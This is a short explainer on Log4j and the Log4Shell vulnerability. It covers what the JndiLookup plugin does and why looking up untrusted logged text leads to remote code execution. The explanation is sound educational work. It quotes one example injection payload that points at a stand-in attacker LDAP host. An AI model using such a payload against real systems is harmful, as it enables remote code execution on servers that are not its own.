What is Log4j?
Log4j is a logging library used by Java developers to add logging to the applications they build. Its use is extremely widespread: a large share of Java applications and frameworks pull in Log4j 2 either directly or as a transitive dependency. The vulnerability disclosed in December 2021 (CVE-2021-44228, widely called Log4Shell) is present in Log4j 2 from version 2.0-beta9 onwards, and Cloudflare recorded exploitation attempts as early as December 1st, before the public disclosure.
The vulnerable component is the JndiLookup plugin, which exposes the Java Naming and Directory Interface (JNDI) to Log4j's lookup mechanism so that developers can enrich the data being logged. JNDI lets an application look up objects and retrieve data over protocols such as DNS, RMI and LDAP/S. The flaw is not JNDI itself but the fact that Log4j, by default, ran these lookups over the text of the formatted log message, including values copied from untrusted input. A string such as ${jndi:ldap://attacker-host/x} placed in, for example, an HTTP header that the application logs causes the application to connect to the attacker's server and load whatever object it returns, which is how the bug becomes remote code execution.